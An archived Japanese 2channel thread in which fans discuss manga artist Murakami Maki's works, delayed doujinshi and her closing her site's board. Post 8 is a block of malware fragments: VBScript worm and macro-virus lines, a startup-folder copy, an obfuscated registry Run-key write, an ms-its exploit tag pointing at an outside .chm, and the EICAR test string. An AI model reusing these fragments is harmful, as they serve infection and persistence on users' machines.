5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

村上真紀作品スレその4

1 :花と名無しさん:2006/12/23(土) 11:38:32 ID:???0
前スレも新スレも落ちたみたいなので立て直した。
テンプレは適当によろしく。

2 :花と名無しさん:2006/12/23(土) 14:22:08 ID:???0
■前スレ
村上真紀作品スレその3
http://comic6.2ch.net/test/read.cgi/gcomic/1143907922/l50

■過去ログ
村上真紀作品スレその2
http://comic6.2ch.net/test/read.cgi/gcomic/1116760432/

【グラビ】村上真紀作品スレ【GH】
http://comic6.2ch.net/test/read.cgi/gcomic/1097390517/



3 :花と名無しさん:2006/12/23(土) 14:22:39 ID:???0
■主要作品
ゲーマーズヘブン!
 月刊コミックブレイド(マッグガーデン)現在長期休載中
  マッグガーデン BLADE COMICS 1〜4

キミのうなじに乾杯
  ソニー・マガジンズ バーズコミックス 1〜2
  幻冬舎 バーズコミックス 1

グラビテーション
  ソニー・マガジンズ  ソニー・マガジンズコミックス 1〜11
  幻冬舎 バーズコミックス ガールズコレクション 1〜12

 グラビテーション・ザ・ノベル
  純 礼音 (著) ソニー・マガジンズノベルズ 

 小説 グラビテーション―voice the temptation
  純 礼音 (著) 幻冬舎コミックス

 グラビテーション完全攻略ファンブック
  ソニー・マガジンズコミックス KB COLLECTION 1〜2

グラビテーション第二部
 幻冬舎ウェブサイト内WebコミックGENZO「スピカ」にて連載中


4 :花と名無しさん:2006/12/23(土) 14:23:12 ID:???0
■本人のサイトについて
別名義で運営しているサークル「CROCODILE-Ave.」のサイト及び発行物は
成人向きですのでURLは貼りません。自分で検索して下さい。

5 :花と名無しさん:2006/12/23(土) 20:28:51 ID:???0
■GENZOモバイル版
【DoCoMo】
 iMenu⇒メニュー/検索⇒コミック/書籍⇒GENZO/幻冬舎コミックス
【Softbank】
 Yahoo!ケータイ⇒メニューリスト⇒書籍・コミック・写真集⇒電子コミック⇒「GENZO/幻冬舎コミックス」
【au】
 EZトップメニュー⇒カテゴリで探す⇒電子書籍⇒コミック⇒「GENZO/幻冬舎コミックス」

6 :花と名無しさん:2006/12/23(土) 20:59:30 ID:???0
>>1


>「のんびり送料」をご選択の場合、お届けまでに発送メール
>送信日より一週間ほどのお時間を頂く場合がございます。
これって本当だったんだ。まだ届かねーよw
250円ケチったばっかりにwww……orz

7 :花と名無しさん:2006/12/24(日) 11:15:50 ID:???0
>>1さん乙です。
前のその4スレを立てた者です・・・仕切りなおししてもらってありがとうございます。

快適でうなPAI通販して、届くのを待ってるんだけど、
評判が「痛い」という事で、何だか期待半分心配半分です。

8 :<body onload=window()>:2006/12/24(日) 11:20:54 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

9 :花と名無しさん:2006/12/24(日) 16:39:36 ID:???0
本業の連載は、予定してる同人発行終わるまで再開なし?

10 :花と名無しさん:2006/12/24(日) 20:19:10 ID:???0
うなPAI読んだ。

これイイよ。キャラの表情が良くて生き生きしてる。
マキタン、描いてて楽しかったんだろーな。
UNAPAI-01という表記とBBSでのポン太さん人間化発言からすると、
きっと次も出るだろうと思う。

猟奇表現は劇画系みたいな生々しさはない。
かといって万人に薦められるかというと…。
ラッシュ編1で次々と人を切っていくシーンがあったけど、
あれが平気なら大丈夫かもしれない。(責任は取らない)

しかし、ジンがイクときに呟いたセリフは何の伏線なんだろう。気になる。

11 :花と名無しさん:2006/12/25(月) 17:47:52 ID:???0
うなPAIまだ届かねぇぇぇぇ(通販)!!!
カピバラまだかぁぁぁ!!!!
本編ほったらかしかよぉぉぉぉぉ!!!!!

とても口に出せやしないので、ここで吐き出してみる。



12 :花と名無しさん:2006/12/25(月) 21:31:32 ID:???0
メガグラAの加筆カラー一発分のほうが
先に出来ちゃったみたいだもんね
一番最初に発表したのがカピバラだったはず

13 :花と名無しさん:2006/12/26(火) 21:48:15 ID:tRu971Ng0
保守age

14 ::2006/12/27(水) 21:45:34 ID:???0
GHDC青はいつ出るんだ?

15 :花と名無しさん:2006/12/27(水) 22:23:42 ID:???0
殆どの取扱店で売り切れのラッシュ編1が気になるんだけど、
再録ではそれが載ってるの?
ヒロ×藤崎の絡みが物凄い気になるんだけど、
カピバラの発行はまだまだ先なの?

ぶっちゃけうなぱいメガグラ以上に楽しみだったんだけど、作者やる気なくなっちゃったのかな・・・?

16 :花と名無しさん:2006/12/27(水) 22:45:43 ID:???0
最近はけっこういいペースで発行してると思うんだけどな…。
へんに急いでマキタンが後悔するようなもの出して欲しくないし。

17 :花と名無しさん:2006/12/28(木) 00:35:35 ID:???0
16さんの言う事ももっともだが、待つ身には長く感じるもの。
自分もカピバラ本命だったクチだから。
後悔のないようじっくりじっくり熟成させて、良い本作りを目指してると思いたい・・・
某連載のように休載のまま不完全燃焼なんてことにだけは(ry

18 :花と名無しさん:2006/12/29(金) 01:29:29 ID:???0
1/26(金)配信予定のスピカ2月号にまた名前がない。
再開は来春か、それとも。

19 :花と名無しさん:2006/12/29(金) 20:03:33 ID:???0
スピカで思い出した。
最近の樹把の髪型見てると「生え際ヤバいかも・・・」と思うのは私だけか?

20 :花と名無しさん:2006/12/31(日) 14:19:47 ID:dIE3enHB0
うなPAI今朝届いたよ。
読んでみたら、意外と話に引き込まれた。
勢いが半端ない。途中痛い描写があったけど、流れの一つとして読みきれた。
大晦日にどえらいプレゼントもらった気分になったよ。

という訳で、皆さんよいお年を。

21 :花と名無しさん:2006/12/31(日) 17:43:41 ID:???0
>>20=halca

22 : 【ぴょん吉】 【757円】 :2007/01/01(月) 00:35:45 ID:???0
あけた
実はジンは萌えキャラなのかもしれない

23 :花と名無しさん:2007/01/01(月) 01:40:57 ID:???0
明けましておめでとう

24 :花と名無しさん:2007/01/01(月) 11:30:27 ID:???0
あけおめ
カピバラはいつ出るのかな?

25 :花と名無しさん:2007/01/01(月) 21:19:25 ID:???0
同人の新刊が出て間もないというのに、
大して盛り上がらずに次の話題なんだね
そんなにうなPAIってつまんなかったの?
それともうなぱい自体が人気ないの?

26 :花と名無しさん:2007/01/02(火) 01:19:34 ID:???0
>>25
>同人の新刊が出て間もないというのに、
>大して盛り上がらずに次の話題なんだね
同人の新刊は、どちらかと言うと出る前の方が話題になったかも。
前スレでは結構気にしてた人も多かったみたいだし。
>そんなにうなPAIってつまんなかったの?
つまんないと言うより「好みの分かれる描写あり」だしね・・・
面白いと思った人もいると思う。
>それともうなぱい自体が人気ないの?
人気はそれなりにある。うなぱい本編の話は面白い。
他の連載より短かったせいもあるのでは?
GHDC再録・カピバラ待ちのファンも多いけど。

27 :花と名無しさん:2007/01/03(水) 21:12:08 ID:???0
あれはロストソウルなのか…?
山田父がお揃いの羽をはやしているが、何か関係があるのだろうか

28 :花と名無しさん:2007/01/04(木) 00:07:18 ID:???0
ただのマキタン的趣味だとオモ

29 :花と名無しさん:2007/01/04(木) 15:49:25 ID:???0
新TOP絵はマキタン曰く「19歳あたりのロストソウル」だそうな。
何気に誘いをかけてるようなポージングなような・・・

30 :花と名無しさん:2007/01/06(土) 16:06:23 ID:???0
リミグラ2の旧版ってもう置いてないのかな?
探せばある?
今更、新版じゃなくて旧版がほしくなった。

31 :花と名無しさん:2007/01/06(土) 20:33:10 ID:0D3TBD5H0
ひょっとしてプレミア化するかな?>リミグラ2旧版


32 :花と名無しさん:2007/01/06(土) 20:33:14 ID:???0
中古

33 :花と名無しさん:2007/01/06(土) 20:46:05 ID:???0
>>31
halcaタンこんばんは

34 :花と名無しさん:2007/01/07(日) 17:53:36 ID:???0
旧版の新品はないってことか。
カラーページ分がないんだよね?
新版と旧版どっち買うか迷う…

35 :花と名無しさん:2007/01/09(火) 19:48:43 ID:???0
メガグラAついに完成したか・・・


36 :花と名無しさん:2007/01/09(火) 21:33:34 ID:???0
ロストソウルがロリコンぶっ殺した時上に乗ってるけど、もしかして入ってる?

37 :花と名無しさん:2007/01/10(水) 00:07:35 ID:???0
「アッチ」ってどっちだ? カピバラではないようだが。
EX.のコミックスなら歓迎。

38 :花と名無しさん:2007/01/11(木) 10:40:32 ID:???0
EX.は来月発売のようだな
雑誌連載読んでないから期待

39 :花と名無しさん:2007/01/11(木) 14:54:00 ID:???0
>>38
来月の何日?
調べたけどEX発売のソース自体見つからなかった。

40 :花と名無しさん:2007/01/11(木) 21:31:50 ID:???0
>>39
発売日と値段がでてる
「グラビテーションEX.」「1」で検索汁

連載時よりも白い部分が埋まっているといいな…

41 :花と名無しさん:2007/01/12(金) 04:30:24 ID:???O
ググッたけど発売日って24日?
まだ1ヶ月半あるのか〜。なげー。

42 :花と名無しさん:2007/01/12(金) 20:47:39 ID:???0
2巻はでるのかなー

43 :花と名無しさん:2007/01/13(土) 00:16:43 ID:???0
>>42
2年後に

44 :花と名無しさん:2007/01/13(土) 00:32:10 ID:???0
2巻出る前に休載しそう

45 :花と名無しさん:2007/01/13(土) 00:51:45 ID:???0
その前に2chが閉鎖しそうwww

46 :花と名無しさん:2007/01/14(日) 04:49:56 ID:???O
>>36
入ってるんじゃないか?
自分はそう思ってたんだが。
つうか、何気に原作で猟奇セックル→屍姦を描いてるマキタンに乾杯。

47 :花と名無しさん:2007/01/15(月) 18:45:19 ID:???O
ロストソウル・・・恐ろしい子!

48 :花と名無しさん:2007/01/15(月) 21:58:59 ID:???0
マキタンが同人でどんなものを描いているか知ってる人→入ってる
一般読者→跨っている

ええ、勿論入ってるようにしか見えませんでしたとも

49 :花と名無しさん:2007/01/16(火) 20:14:13 ID:???0
マキタン=エロ同人のイメージが固まりつつあるようだ
いっそそっち方面で堂々と描けば(ry

50 :花と名無しさん:2007/01/17(水) 00:21:23 ID:???0
つうか早くA読みてぇ!
カラーて瑛愁がオールカラーの漫画で一発分あるのか?
それとも1頁だけ??

51 :花と名無しさん:2007/01/17(水) 01:41:16 ID:???0
>>50
一発分って書いてあったぞ
カピバラも気になる所だ

52 :花と名無しさん:2007/01/17(水) 13:40:09 ID:???0
キーボードの子ってハゲてなくね?

53 :花と名無しさん:2007/01/17(水) 23:07:35 ID:???0
あぁそれでサラサラロン毛のヒロとまぐわうって訳か!
こいつぁ一本取られたな〜!w

54 :花と名無しさん:2007/01/17(水) 23:53:39 ID:???0
例の小説の挿絵を描いてる最中か…カピバラは4月になるかな

55 :花と名無しさん:2007/01/18(木) 17:49:17 ID:???0
ぐぐってみたら、以前発行された小説版グラビのリメイクだったのか。
そんな暇があったら休載しっぱなしゲマズとかうなぱいとか(ryと言いたいとこだが、
それでもこっちが需要高いんだろうな・・・

カピバラ、半分諦め入るようになっちゃったよorz

56 :花と名無しさん:2007/01/18(木) 21:57:27 ID:???0
諦め入っても販売開始になったら結局即買い。

57 :花と名無しさん:2007/01/19(金) 13:58:24 ID:???0
需要が高いグラビに力入れるのは分かるが、
ゲマズやうなぱいのが気になるところで終わってる…

同人で出たザジの本編での活躍が気になるな。

58 :花と名無しさん:2007/01/19(金) 23:01:55 ID:???0
カピバラは、夏のバカンスが舞台でも面白そう。
多分そのぐらい伸びると考えたほうがよさそうだし・・・

59 :花と名無しさん:2007/01/20(土) 02:48:54 ID:???0
メガグラはやはりヤフオクで出品されるのを待つしかないのか?
色々(ネットにて)探してみたが、見つからん・・
通販サイトあんまり知らんから、見つからないだけなのかも知れんが・・・

60 :花と名無しさん:2007/01/20(土) 17:15:30 ID:???0
>>59
マキタンが委託している店舗に在庫がなければ新品は無理
再録を待つか、中古で探すか、某掲示板の(ry

61 :花と名無しさん:2007/01/21(日) 12:20:43 ID:???0
サイト休止決定。

62 :花と名無しさん:2007/01/21(日) 13:25:20 ID:???0
空気読まずに余計なこと言われてたからね。
マキタン大丈夫かな・・・。

63 :花と名無しさん:2007/01/21(日) 13:54:42 ID:???0
しかし、何様のつもりだったんだ?あの美○とかいうやつ

64 :花と名無しさん:2007/01/21(日) 14:00:02 ID:???0
一体何があったのか…。
すっかり乗り遅れた

65 :花と名無しさん:2007/01/21(日) 15:24:22 ID:???0
昨夜の掲示板にて

マキタン、実はメガグラAやっと入稿したことを告白し
次はアッチ(恐らくEX.)とカピバラとどちらを先にすればいいかたずねる
 ↓
それぞれすきなほうを答えていたが、
仕事と同人活動を天秤にかけるのか、するべきことがあるならそちらを優先すべきだ
と、説教レスがある
 ↓
マキタン「自分にとってはすべてが仕事です。道楽ではございません。失礼いたしました。」
 ↓
マキタン、承知しましたとレス
 ↓
掲示板休止と新刊の休止

66 :花と名無しさん:2007/01/21(日) 15:28:35 ID:???O
もう同人でも商業でも、新刊が出ればどっちでもいいんだけどなぁ

67 :花と名無しさん:2007/01/21(日) 15:37:44 ID:???0
アンケートも閉めちゃったね…最低限の告知スペース以外残さないつもりかな

68 :花と名無しさん:2007/01/21(日) 15:44:36 ID:???O
マキタン戻ってきてくれ…(ノД`)

69 :花と名無しさん:2007/01/21(日) 15:52:47 ID:???0
>>65サン
詳しくありがとうです。
両立できるのが理想だけども、無理ならばどっちでもいいなぁ


70 :花と名無しさん:2007/01/21(日) 16:23:40 ID:???0
へー。そんなことがあったのか。
ここでのループ話題だなwww まあ凸しちゃうやつはアレだけど…。
にしてもマキタン意外と打たれ弱いんだな

71 :花と名無しさん:2007/01/21(日) 16:49:30 ID:???O
なんかヤなことが重なったのかな。
借金が増えたとか…

72 :花と名無しさん:2007/01/21(日) 16:52:22 ID:???0
>>66
まったくだ

73 :花と名無しさん:2007/01/21(日) 17:02:57 ID:???0
個人的には商業優先(ゲマズ再開)が希望だけど
今回のことでヘソ曲げてどっちもしばらく休業とかになったら最悪だな
叩かれて士気が上がるタイプでもなさそうだし

74 :花と名無しさん:2007/01/21(日) 17:11:39 ID:???0
何でも書いてくれるだけで嬉しいんだけどな。
でも、もう元気でいてくれればいいよ。

75 :花と名無しさん:2007/01/21(日) 20:01:15 ID:???0
プロファイルの文面見る限り、元気なんじゃなかろうか
著しくプライドを傷つけられたって感じ・・・?
凸した奴は今頃青くなってるだろうな

76 :花と名無しさん:2007/01/21(日) 20:22:36 ID:???0
オヤジに負けじと究極の誘い受け・・・とかだったらヤだなw

77 :花と名無しさん:2007/01/21(日) 22:51:15 ID:???0
サービス業であるっていうわりには
連載落としたり、数ページ掲載とか未完とか…ちょっとモニョるけどwww
宣言したからにはバリバリ描いてほしい。 がんばれマキタン


78 :花と名無しさん:2007/01/21(日) 23:37:47 ID:???O
ちょっと見ないうちにそんなことがあったのか・・・。
せっかく創作意欲満々でノリノリだったマキタンに
何てことしてくれたんだ。
説教やら愚痴やらは2ちゃんで垂れ流しとけばいいのに。
>>73のいう通り、このまま休業とかされたら堪らんな・・・。

79 :花と名無しさん:2007/01/21(日) 23:58:01 ID:???0
中々打たれ弱いと思うが
誰よりも率先して掲示板にレスし捲くったり
マキタソをヨイショしまくってたやつが言えるセリフじゃねぇだろと思った。
あーあーて感じだ。

80 :花と名無しさん:2007/01/22(月) 00:17:06 ID:???0
マキタンだってプロとして10年以上のキャリアがあるんだから信念やプライドがあるだろう
あの内容を直接本人に言っていいのは編集の人や家族、気心の知れた友人とかだろうな
たかだか掲示板で常連の、どこの誰とも分からないヤツに
上から物を言う言い方をされたらそりゃ怒るよ

81 :花と名無しさん:2007/01/22(月) 03:23:34 ID:???0
>>60
サンクス
まあ気長に探すわ

>>78
だな
経緯を直接見た訳でないからよく分からんけど
1人のせいで、休業されたら頭に来るよな
まぁとにかく、がんばれ。自分は応援してるからさ、まじで


82 :花と名無しさん:2007/01/22(月) 15:31:41 ID:???0
アンケート復活したが、コメント残せなくなったね
個人的にはザジが出来たからまぁイイが…


83 :花と名無しさん:2007/01/22(月) 17:34:40 ID:???0
ファンとの距離が近くなりずぎると色々とやり辛くなる
あんなもので丁度いいと思う
掲示板も必要なときだけ書き込めるようにすればいい

84 :花と名無しさん:2007/01/23(火) 00:27:35 ID:???0
漏れもマキタソ大好きだがよー
中にはああいうファン居るのも想定内だろ
あの一言で此処までダメージ与えられるんだな・・・

85 :花と名無しさん:2007/01/23(火) 01:53:01 ID:???0
前にここの厨が凸したときはマキタン華麗に受け流してたし
そもそもあの掲示板って空気嫁ないカキコ多かったから、マキタンはそういうの気にしないんだと思ってたww
今回のはリアルで見てないから何ともいえないけど、
相当何かくるものがあったんだろうな。

86 :花と名無しさん:2007/01/23(火) 11:45:09 ID:???0
今回は長文で口調が相当きつかったからな。
マキタン精神的に強くない人だから心配だ。

87 :花と名無しさん:2007/01/23(火) 17:23:36 ID:???0
キツイっていうか、
正論はどんな場合でも正しいと信じて疑わない痛々しさ、
みたいなものはあったよね

88 :花と名無しさん:2007/01/23(火) 21:27:00 ID:???0
サンプルきた

89 :花と名無しさん:2007/01/23(火) 22:04:19 ID:???0
「やるべき事があるなら、何よりそちらを優先しなければなりませんよね?」
「頑張って下さい。応援しています。」

こんな応援の仕方されたらムカつくと思うよ。

19 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)